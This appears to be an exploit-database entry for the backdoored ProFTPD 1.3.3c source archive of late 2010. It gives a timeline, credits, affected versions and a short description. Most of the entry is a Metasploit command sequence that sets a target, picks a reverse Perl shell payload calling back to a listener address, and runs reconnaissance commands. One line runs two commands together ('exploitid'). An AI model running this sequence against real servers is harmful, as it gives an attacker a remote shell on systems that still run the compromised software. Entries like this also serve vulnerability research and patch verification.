Timeline :
Public release of the backdoor presence the 2010-12-01
Metasploit PoC provided the 2010-12-02
PoC provided by :
MC
darkharper2
Reference(s) :
Affected version(s) :
proftpd-1.3.3c from the dates of 2010-11-28 to 2010-12-02
Tested on Ubuntu 10.0.4 LTS with :
proftpd-1.3.3c patched with diff
Description :
This module exploits a malicious backdoor that was added to the ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz] archive between November 28th 2010 and 2nd December 2010.
Commands :
use exploit/unix/ftp/proftpd_133c_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploitid
uname -a
ifconfig